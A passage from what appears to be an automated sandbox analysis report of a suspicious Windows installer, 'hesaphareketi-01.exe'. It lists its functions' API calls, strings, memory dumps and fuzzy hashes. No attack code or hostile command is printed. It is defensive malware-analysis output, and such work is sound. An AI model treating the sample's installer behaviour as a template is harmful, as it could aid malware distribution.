                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 004045B3
                                                                                      • SetCursor.USER32(00000000), ref: 004045B6
                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 004045CF
                                                                                      • SetCursor.USER32(00000000), ref: 004045D2
                                                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404601
                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404613
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                      • String ID: +C@$,Dw$Call$N
                                                                                      • API String ID: 3103080414-1674668432
                                                                                      • Opcode ID: 9a2d0ca3c2f6281e852f2d8aeca5f3bca76ad293f1c4d3c8d798300b4eb97cdc
                                                                                      • Instruction ID: 544d3524579c470af9434eda2f0c3a81960274dfcdaaec18bef3a5beb83851d9
                                                                                      • Opcode Fuzzy Hash: 9a2d0ca3c2f6281e852f2d8aeca5f3bca76ad293f1c4d3c8d798300b4eb97cdc
                                                                                      • Instruction Fuzzy Hash: 0C6192B1A00209BFDB109F60DD85AAA7B79FB84345F00843AF605B72D0D779A951CFA8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405ECE Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406069,?,?), ref: 00405F09
                                                                                      • GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405F12
                                                                                        • Part of subcall function 00405CD9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE9
                                                                                        • Part of subcall function 00405CD9: lstrlenA.KERNEL32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D1B
                                                                                      • GetShortPathNameW.KERNEL32(?,004310E8,00000400), ref: 00405F2F
                                                                                      • wsprintfA.USER32 ref: 00405F4D
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405F88
                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F97
                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCF
                                                                                      • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406025
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00406036
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040603D
                                                                                        • Part of subcall function 00405D74: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\hesaphareketi-01.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
                                                                                        • Part of subcall function 00405D74: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                      • String ID: %ls=%ls$[Rename]
                                                                                      • API String ID: 2171350718-461813615
                                                                                      • Opcode ID: e9e028425c837c753a03fdef0a01934527d0e92a4020d6044e6bdb5cca473c88
                                                                                      • Instruction ID: 79e357045524b81a8ea21183b2a6189fe473d9766cb3db532b5e95eed637b89f
                                                                                      • Opcode Fuzzy Hash: e9e028425c837c753a03fdef0a01934527d0e92a4020d6044e6bdb5cca473c88
                                                                                      • Instruction Fuzzy Hash: D1315771100B05ABD220AB669D48F6B3A9CDF45744F15003FF902F62D2EA7CD9118ABC
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00404814 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 183stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CoTaskMemFree.OLE32 ref: 0040481B
                                                                                        • Part of subcall function 00405B53: lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403360,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75383420,004035BF,?,00000006,00000008,0000000A), ref: 00405B59
                                                                                        • Part of subcall function 00405B53: CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403360,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75383420,004035BF,?,00000006,00000008,0000000A), ref: 00405B63
                                                                                        • Part of subcall function 00405B53: lstrcatW.KERNEL32(?,0040A014), ref: 00405B75
                                                                                      • lstrcmpiW.KERNEL32(Call,?,00000000,?), ref: 0040484D
                                                                                      • lstrcatW.KERNEL32(?,Call), ref: 00404859
                                                                                      • SetDlgItemTextW.USER32(?,000003FB), ref: 0040486B
                                                                                      • GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,00000001,0042B218,?,?,000003FB,?), ref: 0040492E
                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404949
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: Freelstrcat$CharDiskItemPrevSpaceTaskTextlstrcmpilstrlen
                                                                                      • String ID: ,Dw$C:\Users\user\AppData\Local\Temp\Undige$Call
                                                                                      • API String ID: 611778071-2967598475
                                                                                      • Opcode ID: 7f9766c05398ca30f14412b9bfc5ccb15a032b594e65042cac9cdc5b2d25a9f5
                                                                                      • Instruction ID: c7a6cf9d2728612dc9674932cc64b953b15d3efef308e0bab2ab371e76ad5b10
                                                                                      • Opcode Fuzzy Hash: 7f9766c05398ca30f14412b9bfc5ccb15a032b594e65042cac9cdc5b2d25a9f5
                                                                                      • Instruction Fuzzy Hash: 685193F1E00204AADB11AFA5CD41AEFB7B8EF84314F10857BE611B62D1D77C9A418B6D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00406516 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\hesaphareketi-01.exe",0040334E,C:\Users\user\AppData\Local\Temp\,75383420,004035BF,?,00000006,00000008,0000000A), ref: 00406579
                                                                                      • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406588
                                                                                      • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\hesaphareketi-01.exe",0040334E,C:\Users\user\AppData\Local\Temp\,75383420,004035BF,?,00000006,00000008,0000000A), ref: 0040658D
                                                                                      • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\hesaphareketi-01.exe",0040334E,C:\Users\user\AppData\Local\Temp\,75383420,004035BF,?,00000006,00000008,0000000A), ref: 004065A0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: Char$Next$Prev
                                                                                      • String ID: "C:\Users\user\Desktop\hesaphareketi-01.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 589700163-3968801132
                                                                                      • Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                                                      • Instruction ID: 662237d401549a0b86d5a4e6e01ff77a7750504751085e1aca306c60b5ffe750
                                                                                      • Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                                                      • Instruction Fuzzy Hash: 3911B655800612A5D7303B18BC40AB776B8EF68750B52403FED8A732C5E77C5CA286BD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040427E Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 0040429B
                                                                                      • GetSysColor.USER32(00000000), ref: 004042B7
                                                                                      • SetTextColor.GDI32(?,00000000), ref: 004042C3
                                                                                      • SetBkMode.GDI32(?,?), ref: 004042CF
                                                                                      • GetSysColor.USER32(?), ref: 004042E2
                                                                                      • SetBkColor.GDI32(?,?), ref: 004042F2
                                                                                      • DeleteObject.GDI32(?), ref: 0040430C
                                                                                      • CreateBrushIndirect.GDI32(?), ref: 00404316
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2320649405-0
                                                                                      • Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                                                      • Instruction ID: b3876bbcbbff373df079470ccdc5149205509338ab7e68b668f4883140def8c6
                                                                                      • Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                                                      • Instruction Fuzzy Hash: B22151B1600704ABCB219F68DE08B5BBBF8AF41714F04897DFD96E26A0D734E944CB64
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00402644 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ReadFile.KERNEL32(?,?,?,?), ref: 004026B0
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026EB
                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040270E
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402724
                                                                                        • Part of subcall function 00405E55: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E6B
                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                      • String ID: 9
                                                                                      • API String ID: 163830602-2366072709
                                                                                      • Opcode ID: 0f6749e0356039c80119e9da3c7509a60750b74a106ccf27ce207c31930fcb0b
                                                                                      • Instruction ID: 4c47c5b6e7001fd487639b42c981b506dedcea616f9f6d447a3608767ea6fa5a
                                                                                      • Opcode Fuzzy Hash: 0f6749e0356039c80119e9da3c7509a60750b74a106ccf27ce207c31930fcb0b
                                                                                      • Instruction Fuzzy Hash: 8351E575D1021AABDF20DFA5DA88AAEB779FF04304F50443BE511B72D0D7B899828B58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00404BB0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BCB
                                                                                      • GetMessagePos.USER32 ref: 00404BD3
                                                                                      • ScreenToClient.USER32(?,?), ref: 00404BED
                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BFF
                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C25
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$Send$ClientScreen
                                                                                      • String ID: f
                                                                                      • API String ID: 41195575-1993550816
                                                                                      • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                      • Instruction ID: fcc096391eddebe8eb85a5aa76d4b30f922b4a39187f2a8acbab72006efdbce5
                                                                                      • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                      • Instruction Fuzzy Hash: 31015E71900218BAEB10DB94DD85BFEBBBCAF95B11F10412BBA50B62D0D7B499418BA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00402DD7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
                                                                                      • MulDiv.KERNEL32(00059E97,00000064,0005A09B), ref: 00402E20
                                                                                      • wsprintfW.USER32 ref: 00402E30
                                                                                      • SetWindowTextW.USER32(?,?), ref: 00402E40
                                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E52
                                                                                      Strings
                                                                                      • verifying installer: %d%%, xrefs: 00402E2A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                      • String ID: verifying installer: %d%%
                                                                                      • API String ID: 1451636040-82062127
                                                                                      • Opcode ID: f82802282f146ff8d7a81516d08dd23d853d0675b9ceba9b20e767ba0194de88
                                                                                      • Instruction ID: 0244175548504e0de7267acb57bf05e9e9b1595e8d7e84e5cb6d98a661a40fbb
                                                                                      • Opcode Fuzzy Hash: f82802282f146ff8d7a81516d08dd23d853d0675b9ceba9b20e767ba0194de88
                                                                                      • Instruction Fuzzy Hash: B6014470640208BBDF209F50DE49FAA3B69BB00304F008039FA46A51D0DBB889558B59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 100024A4 Relevance: 9.1, APIs: 6, Instructions: 98COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                      • GlobalFree.KERNEL32(?), ref: 1000256D
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100025A8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1296135375.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1296082839.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1296189107.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1296242418.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$Alloc
                                                                                      • String ID:
                                                                                      • API String ID: 1780285237-0
                                                                                      • Opcode ID: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                                                      • Instruction ID: 149f0ffe7112dafd64944f245e56057b96fa329c468151baa91e3d773918aa42
                                                                                      • Opcode Fuzzy Hash: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                                                      • Instruction Fuzzy Hash: 1031AF71504651EFF721CF14CCA8E2B7BB8FB853D2F114119F940961A8C7719851DB69
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00402592 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsj313A.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll,00000400,?,?,00000021), ref: 004025E2
                                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsj313A.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll,00000400,?,?,00000021), ref: 004025ED
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWidelstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsj313A.tmp$C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll
                                                                                      • API String ID: 3109718747-3191707098
                                                                                      • Opcode ID: 07d53d2b07502590e3e1b39d6501f1557fe553bf4e29e33a0fbec8c4be15c9f1
                                                                                      • Instruction ID: 59cf546ef3811be8ee7c727c8e5eea11e2141b44b9e391d5d171073bbb1e77e0
                                                                                      • Opcode Fuzzy Hash: 07d53d2b07502590e3e1b39d6501f1557fe553bf4e29e33a0fbec8c4be15c9f1
                                                                                      • Instruction Fuzzy Hash: F611EB72A01204BEDB146FB18E8EA9F77659F45398F20453BF102F61C1DAFC89415B5E
